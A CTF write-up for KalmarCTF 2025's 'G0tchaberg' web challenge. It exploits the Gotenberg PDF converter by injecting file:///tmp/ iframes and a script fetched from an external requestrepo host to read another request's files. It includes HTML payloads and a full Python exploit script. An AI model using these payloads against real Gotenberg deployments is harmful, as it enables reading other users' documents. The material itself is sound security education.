G0tchaberg

Posted Mar 14, 2025 Updated Mar 16, 2025

By Marios Kailis

11 min read

G0tchaberg

Description

Can you steal the flag, even though I’m using the latest version of https://github.com/gotenberg/gotenberg?

Individual instances can be started at the link below:

https://lab1.kalmarc.tf/

Solution

Initial Look

We are given the source code of the application. There are 4 files, Dockerfile, compose.yml, entrypoint.sh, and index.html.

Dockerfile

We can see that the application is based on alpine:latest and installs curl as a dependency. The entrypoint.sh script is copied to the /app directory and is set as the entrypoint.

  
FROM alpine:latest

RUN apk add --no-cache curl

WORKDIR /app

COPY entrypoint.sh index.html ./
RUN chmod +x entrypoint.sh

CMD ["./entrypoint.sh"]

entrypoint.sh

We can see that the script sends a POST request to http://gotenberg:3000/forms/chromium/convert/html with the index.html file as a form data, every 5 seconds. The output is saved as output.pdf.

  
#!/bin/sh

while true; do
    curl -s 'http://gotenberg:3000/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
    sleep 5
done

index.html

This is the file that contains the flag.

  
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Flag</title>
</head>
<body>
	<h1>Very private information!</h1>
    <h2>kalmar{test_flag}</h2>
</body>
</html>

compose.yml

This file is used to start the application. It starts the gotenberg service and the flagbot service. The flagbot service depends on the gotenberg service.

  
services:
  gotenberg:
    restart: unless-stopped
    image: gotenberg/gotenberg:latest # https://gotenberg.dev/
    ports:
      - "8642:3000"
    networks:
      - local

  flagbot:
    restart: unless-stopped
    build: ./flagbot
    depends_on:
      - gotenberg
    networks:
      - local

networks:
  local:

Gotenberg

Gotenberg provides a developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more! Thanks to Docker, you don’t have to install each tool in your environments; drop the Docker image in your stack, and you’re good to go!

By reading the documentation of Gotenberg, we find all the available routes.

Let’s try to convert an HTML file to a PDF file using the /forms/chromium/convert/html route.

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

  
<html>
<body>
    <h1>MariosK1574</h1>    
</body>
</html>

It works!

Digging Deeper

So far we have no idea how to get the flag. Let’s see if there are any known vulnerabilities or open issues with Gotenberg.

We came across this issue

So we have local file read under the /tmp directory. Still don’t know how this can help us. What is stored in the /tmp directory?

Let’s hop into the container and find out more.

We can see there are 2 directories, with random UUIDs as names. One has information about the browser and the other is empty. One thing we notice is that in the empty directory, we see another directory being created for an instant and then being deleted. This is happening every 5 seconds. This is the same time interval as the entrypoint.sh script.

Let’s read the documentation again and try to find an option that would allow us to delay the deletion of the temporary files.

Wait Before Rendering

We notice that there is an option called waitDelay that can be used to wait when loading an HTML document before converting it to a PDF(View Link).

Let’s send a request with the waitDelay option and take a look at the /tmp again

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' --form 'waitDelay=15s' -o ./output.pdf

Hmmm, this is very interesting. We list the files in the directory and we just see 1 directory, and then we list it once again a few seconds later and we see 2 directories. Let’s send another request and check the contents of the directories.

We can see that in the first directory, there is the original index.html we sent, and in the second directory, there is the index.html containing the flag.

Now we start to understand how gotenberg works.

Exploitation

Chromium Queue

From the experimentations we did, we got a grasp of how the Chromium queue works in Gotenberg. Every request that is sent to the chromium service is added to a queue. For each request in the queue, a new directory is created with a random UUID as the name, and in that directory, the original documents that are to be converted are stored. One request is processed at a time. After the request is processed, and the document is converted to pdf, the directory is deleted and the pdf is sent back to the user. Finally, the request is removed from the queue and the next request is processed.

File Read

Let’s create a temporary file (“Hello World!”) in the /tmp directory and try to read it.

  
<iframe src="file:///tmp/test.txt"></iframe>

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

We can see that the file is read successfully. Let’s also try to list the contents of the /tmp directory.

  
<iframe src="file:///tmp/" width="100%" height="100%"></iframe>

  
curl -s 'http://localhost:8642/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf

We can see that the contents of the /tmp directory are listed successfully.

So far we know the following:

We can list the contents of the /tmp directory
We can read files in the /tmp directory
We know the flag is stored in the /tmp directory
We can delay the deletion of the temporary files, allowing us to read the flag

Let the Magic Begin

When we start thinking about the attack chain, we immediately come across a problem. We can try to send a request to list the directories with a delay, to get the UUID of the directory that contains the flag but as soon as the request is done, the flag will be deleted. So we will have the correct UUID but we won’t be able to send a follow-up request to read the flag, because it will not be there anymore.

After some brainstorming, we come up with the following attack chain:

Send a request to list the contents of the /tmp directory to get the UUID of the empty directory.

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>

Send a request to list the contents of the empty directory to get the UUID of the directory that contains the flag. This request will contain an iframe that loads the empty directory. We add a delay to the request to give us enough time for the other requests to enter the queue. 1st request on the queue

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var uuid = '';
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>

Immediately send a request to read the flag. This request will contain a script tag that loads a script that we host on our server. This script will dynamically create an iframe that loads the flag. We add a delay to the request to give us enough time to process the previous requests, extract the UUIDs from the pdf and update the script. 2nd request on the queue

  
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
<body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = 'https://t9gk8ph0.requestrepo.com/main.js';
            document.head.appendChild(script);

        }, 15000);
    </script>
  </body>
</html>

  
var uuid1 = '';
var uuid2 = '';
var iframe = document.createElement('iframe');
iframe.src = `file:///tmp/${uuid1}/${uuid2}/index.html`;
iframe.height = 1000;
iframe.width = 1000;
document.body.appendChild(iframe);

The flagbot service will send a request to convert the index.html file to a pdf. 3rd request on the queue

Automated Python Script

We implemented the attack chain in a python script. It uses requestrepo to host the script.

Note: You may have to run the script 3-4 times, since we haven’t found a way to identify with certainty which UUID from the 3 we get is the correct one.

  
import requests
import fitz
import re
from io import BytesIO
from requestrepo import Requestrepo
import concurrent.futures
import time

base_url = "https://9848daeb59d6995c04676fa4311bc27f-51763.inst1.chal-kalmarc.tf"
url = f"{base_url}/forms/chromium/convert/html"
requestrepo_url = "" # Your requestrepo url
token = "" # Your requestrepo token

uuid_pattern = r"\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\b"

stages = [
    {
        "name": "Stage-1",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        var iframe = document.createElement('iframe');
        iframe.src = 'file:///tmp/';
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
    </script>
  </body>
</html>""",
        "waitDelay": "1s"
    },
    {
        "name": "Stage-2",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var uuid = '{uuid1}';  // Insert uuid1 here
            var iframe = document.createElement('iframe');
            iframe.src = `file:///tmp/${uuid}/`;
            iframe.height = 1000;
            iframe.width = 1000;
            document.body.appendChild(iframe);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    },
    {
        "name": "Stage-3",
        "html": """<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>My PDF</title>
  </head>
  <body>
    <script>
        setTimeout(function() {
            var script = document.createElement('script');
            script.src = '"""+requestrepo_url+"""main.js';
            document.head.appendChild(script);
        }, 5000);
    </script>
  </body>
</html>""",
        "waitDelay": "6s"
    }
]

def extract_uuids_from_pdf(pdf_data):
    pdf_stream = BytesIO(pdf_data)
    doc = fitz.open(stream=pdf_stream, filetype="pdf")

    extracted_text = "\n".join([page.get_text("text") for page in doc])

    uuids = re.findall(uuid_pattern, extracted_text)
    
    return uuids, extracted_text

def process_stage(stage, uuid1=None, uuid2=None, uuid3=None, uuid4=None):
    print(f"\n🚀 Sending {stage['name']} request...")

    if(stage["name"] == "Stage-3"):
        time.sleep(1)

    html_content = stage["html"]
    if uuid1:
        html_content = html_content.replace("{uuid1}", uuid1)
    if uuid2:
        html_content = html_content.replace("{uuid2}", uuid2)
    if uuid3:
        html_content = html_content.replace("{uuid3}", uuid3)
    if uuid4:
        html_content = html_content.replace("{uuid4}", uuid4)

    files = {"files": ("index.html", html_content, "text/html")}
    data = {"waitDelay": stage["waitDelay"]}

    response = requests.post(url, files=files, data=data)

    if response.status_code == 200:
        pdf_data = response.content

        uuids, extracted_text = extract_uuids_from_pdf(pdf_data)

        print(f"\n📝 Extracted Text from {stage['name']} PDF:\n")
        print(extracted_text)

        if uuids:
            print("\n🔍 Extracted UUIDs:")
            for uuid in uuids:
                print(uuid)
            return uuids
        else:
            print("\n❌ No UUIDs found in the extracted text.")
            return None
    else:
        print(f"⚠️ Error: Received status code {response.status_code}")
        print(f"⚠️ Error: Received response content {response.content}")
        return None

def update_requestrepo(uuids):
    client = Requestrepo(token=token, host="requestrepo.com", port=443, protocol="https")

    if len(uuids) >= 3:
        script_content = f"""
        var uuid1 = '{uuids[0]}';
        var uuid2 = '{uuids[2]}';
        var iframe = document.createElement('iframe');
        iframe.src = `file:///tmp/$/$/index.html`;
        iframe.height = 1000;
        iframe.width = 1000;
        document.body.appendChild(iframe);
        """
        
        client.update_http(raw=script_content.encode())
        client.update_http(headers={"Content-Type": "application/javascript"})
        print("\n✅ main-remote.js updated with the UUIDs.")
    else:
        print("❌ Not enough UUIDs to update main-remote.js.")

def test_stages_concurrently():
    print("🚀 Starting Stage-1...")
    uuids_stage_1 = process_stage(stages[0])

    if uuids_stage_1:
        uuid1 = uuids_stage_1[1]
        print(f"🔑 Extracted UUID from Stage-1: {uuid1}")

        with concurrent.futures.ThreadPoolExecutor() as executor:
            future_stage_2 = executor.submit(process_stage, stages[1], uuid1)
            future_stage_3 = executor.submit(process_stage, stages[2], uuid1)

            uuids_stage_2 = future_stage_2.result()
            if uuids_stage_2:
                print("\n🔑 Extracted UUIDs from Stage-2:")
                for uuid in uuids_stage_2:
                    print(uuid)
                update_requestrepo(uuids_stage_2)

            uuids_stage_3 = future_stage_3.result()
            if uuids_stage_3:
                print("\n🔑 Extracted UUIDs from Stage-3:")
                for uuid in uuids_stage_3:
                    print(uuid)

                uuids = uuids_stage_2 + uuids_stage_3
                print("\n🔑 Combined UUIDs extracted from Stage-2 and Stage-3:")
                for uuid in uuids:
                    print(uuid)

if __name__ == "__main__":
    test_stages_concurrently()

Dependencies:

pip install PyMuPDF requestrepo fitz requests

Flag

The flag is kalmar{g0tcha!_well_done_that_was_fun_wasn't_it?_we_would_appreciate_if_you_create_a_ticket_with_your_solution}.

CTF Writeups, KalmarCTF 2025

web

This post is licensed under CC BY 4.0 by the author.